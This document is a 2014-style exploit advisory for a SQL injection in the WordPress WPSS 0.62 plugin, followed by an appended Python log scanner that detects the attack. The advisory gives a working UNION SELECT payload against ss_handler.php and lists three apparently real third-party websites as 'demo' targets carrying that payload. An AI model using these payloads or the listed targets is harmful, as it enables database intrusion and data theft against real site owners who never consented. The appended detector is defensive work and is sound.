WordPress WPSS plugin version 0.62 suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
| [*] Exploit Title: WordPress WPSS V 0.62 Plugin SQL Injection
|
| [*] Exploit Author: Ashiyane Digital Security Team
|
| [*] Date : 2014-08-05
|
| [*] Vendor Homepage : http://timrohrer.com/blog/?page_id=71
|
| [*] Software Link : http://timrohrer.com/blog/files/wpSS_v0.62.zip
|
| [*] Version : 0.62
|
| [*] Tested on: Windows, Mozilla Firefox
|-------------------------------------------------------------------------|
| [*] PoC :
|
| [*]
[Localhost]/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#
|
|-------------------------------------------------------------------------|
| [*] Demo:
|
| [*]
http://www.tahoebusinesses.com//wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#
|
| [*]
http://www.forzabykemp.com/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#
|
| [*]
http://calgarysalesteam.com/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#
|
|-------------------------------------------------------------------------|
| [*]Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
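
Added example (not part of the original advisory or the plugin's code): a log check a site owner can run to find requests to the ss_handler.php endpoint whose ss_id value is not a plain integer, which is what the PoC above sends. It assumes Combined Log Format and that legitimate ss_id values are non-negative integers; the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote

# Endpoint and parameter named in the advisory's PoC (compared lower-cased).
HANDLER_SUFFIX = "/wp-content/plugins/wpss/ss_handler.php"
PARAM = "ss_id"

# Combined Log Format: client, timestamp, "METHOD target PROTO", status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')


def bad_ss_id_values(target):
    """Return ss_id values that are not plain decimal integers, or []."""
    # Split by hand: urlsplit() would read a leading "//" as a host name.
    path, _, query = target.partition("?")
    path = re.sub(r"/+", "/", unquote(path)).lower()
    if not path.endswith(HANDLER_SUFFIX):
        return []
    values = parse_qs(query, keep_blank_values=True).get(PARAM, [])
    # Assumption: legitimate ss_id values are non-negative integers.
    return [v for v in values if not re.fullmatch(r"[0-9]+", v)]


def scan(lines):
    """Return (line_no, client, status, bad_values) for each flagged request."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        bad = bad_ss_id_values(target)
        if bad:
            hits.append((line_no, client, int(status), bad))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Aug/2014:10:00:01 +0000] "GET /wp-content/plugins/wpSS/ss_handler.php?ss_id=3 HTTP/1.1" 200 512',
    '198.51.100.7 - - [05/Aug/2014:10:00:05 +0000] "GET /wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4 HTTP/1.1" 200 734',
    '192.0.2.10 - - [05/Aug/2014:10:00:09 +0000] "GET /index.php?ss_id=abc HTTP/1.1" 200 1024',
    '203.0.113.4 - - [05/Aug/2014:10:00:12 +0000] "GET //wp-content/plugins/wpSS/ss_handler.php?x=1&ss_id= HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```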